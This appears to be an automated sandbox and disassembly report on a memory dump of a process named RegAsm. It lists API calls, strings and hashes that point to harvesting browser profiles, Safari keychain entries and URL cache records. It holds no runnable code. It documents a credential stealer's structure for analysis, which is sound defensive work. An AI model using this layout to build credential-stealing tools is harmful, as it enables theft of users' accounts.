                                                                Similarity
                                                                • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                                                                • String ID: OsError 0x%x (%u)
                                                                • API String ID: 2360000266-2664311388
                                                                APIs
                                                                • GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                Similarity
                                                                • API ID: Version
                                                                • String ID:
                                                                • API String ID: 1889659487-0
                                                                APIs
                                                                • _wcsicmp.MSVCRT ref: 004022A6
                                                                • _wcsicmp.MSVCRT ref: 004022D7
                                                                • _wcsicmp.MSVCRT ref: 00402305
                                                                • _wcsicmp.MSVCRT ref: 00402333
                                                                  • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                  • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                • memset.MSVCRT ref: 0040265F
                                                                • memcpy.MSVCRT(?,?,00000011), ref: 0040269B
                                                                  • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                  • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                • memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
                                                                • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                                • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                                Similarity
                                                                • API ID: _wcsicmp$Freememcpy$Library$AddressLocalProcmemsetwcslen
                                                                • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                                • API String ID: 577499730-1134094380
                                                                Similarity
                                                                • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                                • String ID: :stringdata$ftp://$http://$https://
                                                                • API String ID: 2787044678-1921111777
                                                                • Opcode ID: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                                • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                                                • Opcode Fuzzy Hash: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                                • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                                                APIs
                                                                • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                                • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                                • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                                • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                                • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                                • GetWindowRect.USER32(?,?), ref: 00414088
                                                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                                • GetDC.USER32 ref: 004140E3
                                                                • wcslen.MSVCRT ref: 00414123
                                                                • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                                • ReleaseDC.USER32(?,?), ref: 00414181
                                                                • _snwprintf.MSVCRT ref: 00414244
                                                                • SetWindowTextW.USER32(?,?), ref: 00414258
                                                                • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                                • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                                • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                                • GetClientRect.USER32(?,?), ref: 004142E1
                                                                • GetWindowRect.USER32(?,?), ref: 004142EB
                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                                • GetClientRect.USER32(?,?), ref: 0041433B
                                                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                                • String ID: %s:$EDIT$STATIC
                                                                • API String ID: 2080319088-3046471546
                                                                • Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                                                • Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                                                APIs
                                                                • EndDialog.USER32(?,?), ref: 00413221
                                                                • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                                • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                                • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                                • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                                • memset.MSVCRT ref: 00413292
                                                                • memset.MSVCRT ref: 004132B4
                                                                • memset.MSVCRT ref: 004132CD
                                                                • memset.MSVCRT ref: 004132E1
                                                                • memset.MSVCRT ref: 004132FB
                                                                • memset.MSVCRT ref: 00413310
                                                                • GetCurrentProcess.KERNEL32 ref: 00413318
                                                                • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                                • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                                • memset.MSVCRT ref: 004133C0
                                                                • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                                • memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
                                                                • wcscpy.MSVCRT ref: 0041341F
                                                                • _snwprintf.MSVCRT ref: 0041348E
                                                                • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                                • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                                • SetFocus.USER32(00000000), ref: 004134B7
                                                                Strings
                                                                • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                                • {Unknown}, xrefs: 004132A6
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                • API String ID: 4111938811-1819279800
                                                                • Opcode ID: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                                                • Opcode Fuzzy Hash: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                                                APIs
                                                                • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                                • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                                • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                                • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                                • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                                • SetCursor.USER32(00000000,?,?), ref: 0040129E
                                                                • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                                • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                                • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                                • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                                • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                                • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                                • EndDialog.USER32(?,?), ref: 0040135E
                                                                • DeleteObject.GDI32(?), ref: 0040136A
                                                                • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                                • ShowWindow.USER32(00000000), ref: 00401398
                                                                • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                                • ShowWindow.USER32(00000000), ref: 004013A7
                                                                • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                                • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                                • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                                • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                • String ID:
                                                                • API String ID: 829165378-0
                                                                • Opcode ID: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                                                • Opcode Fuzzy Hash: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                                                APIs
                                                                • memset.MSVCRT ref: 00404172
                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                • wcscpy.MSVCRT ref: 004041D6
                                                                • wcscpy.MSVCRT ref: 004041E7
                                                                • memset.MSVCRT ref: 00404200
                                                                • memset.MSVCRT ref: 00404215
                                                                • _snwprintf.MSVCRT ref: 0040422F
                                                                • wcscpy.MSVCRT ref: 00404242
                                                                • memset.MSVCRT ref: 0040426E
                                                                • memset.MSVCRT ref: 004042CD
                                                                • memset.MSVCRT ref: 004042E2
                                                                • _snwprintf.MSVCRT ref: 004042FE
                                                                • wcscpy.MSVCRT ref: 00404311
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                                • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                                • API String ID: 2454223109-1580313836
                                                                • Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                                • Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                                APIs
                                                                  • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                                • SetMenu.USER32(?,00000000), ref: 00411453
                                                                • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                                • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                                • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                                • memcpy.MSVCRT(?,?,00002008,/nosaveload,00000000,00000001), ref: 004115C8
                                                                • ShowWindow.USER32(?,?), ref: 004115FE
                                                                • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                                • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                                • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                                • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                                • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                                  • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                                  • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                                • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                                • API String ID: 4054529287-3175352466
                                                                • Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                                • Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                                                APIs
                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: AddressProc$HandleModule
                                                                • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                                • API String ID: 667068680-2887671607
                                                                • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                                                • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: _snwprintf$memset$wcscpy
                                                                • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                • API String ID: 2000436516-3842416460
                                                                • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                                • Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                                APIs
                                                                  • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                                  • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                                  • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                  • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                  • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                  • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                  • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                  • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                  • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                  • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                  • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                                • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                                • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                                • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                                • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                                • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                                • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                                • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                                • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                                • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                                • String ID:
                                                                • API String ID: 1043902810-0
                                                                • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                                                • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                                                APIs
                                                                  • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                  • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                • free.MSVCRT ref: 0040E49A
                                                                  • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                • memset.MSVCRT ref: 0040E380
                                                                  • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                  • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                • wcschr.MSVCRT ref: 0040E3B8
                                                                • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,75922EE0), ref: 0040E3EC
                                                                • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,75922EE0), ref: 0040E407
                                                                • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,75922EE0), ref: 0040E422
                                                                • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,75922EE0), ref: 0040E43D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                                                • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                • API String ID: 3849927982-2252543386
                                                                • Opcode ID: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                                • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                                • Opcode Fuzzy Hash: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                                • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58
                                                                APIs
                                                                • ??2@YAPAXI@Z.MSVCRT(?,?,0040DC1B,?,00000000), ref: 0044480A
                                                                • _snwprintf.MSVCRT ref: 0044488A
                                                                • wcscpy.MSVCRT ref: 004448B4
                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,OriginalFileName,00000000,?,LegalCopyright,00000000,?,InternalName,00000000,?,CompanyName,00000000,?,ProductVersion), ref: 00444964
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: ??2@??3@_snwprintfwcscpy
                                                                • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                • API String ID: 2899246560-1542517562
                                                                • Opcode ID: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                                                                • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                                                • Opcode Fuzzy Hash: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                                                                • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                                                APIs
                                                                  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                                • ??2@YAPAXI@Z.MSVCRT(00000001,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 0040859D
                                                                  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                • memset.MSVCRT ref: 004085CF
                                                                • memset.MSVCRT ref: 004085F1
                                                                • memset.MSVCRT ref: 00408606
                                                                • strcmp.MSVCRT ref: 00408645
                                                                • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086DB
                                                                • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086FA
                                                                • memset.MSVCRT ref: 0040870E
                                                                • strcmp.MSVCRT ref: 0040876B
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000001E), ref: 0040879D
                                                                • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                                • String ID: ---
                                                                • API String ID: 3437578500-2854292027
                                                                • Opcode ID: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                                                                • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                                                • Opcode Fuzzy Hash: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                                                                • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                                                APIs
                                                                • memset.MSVCRT ref: 0041087D
                                                                • memset.MSVCRT ref: 00410892
                                                                • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                • GetSysColor.USER32(0000000F), ref: 00410999
                                                                • DeleteObject.GDI32(?), ref: 004109D0
                                                                • DeleteObject.GDI32(?), ref: 004109D6
                                                                • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                • String ID:
                                                                • API String ID: 1010922700-0
                                                                • Opcode ID: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                                                                • Opcode Fuzzy Hash: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                                                                APIs
                                                                  • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                • malloc.MSVCRT ref: 004186B7
                                                                • free.MSVCRT ref: 004186C7
                                                                • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                                • free.MSVCRT ref: 004186E0
                                                                • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                                • malloc.MSVCRT ref: 004186FE
                                                                • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
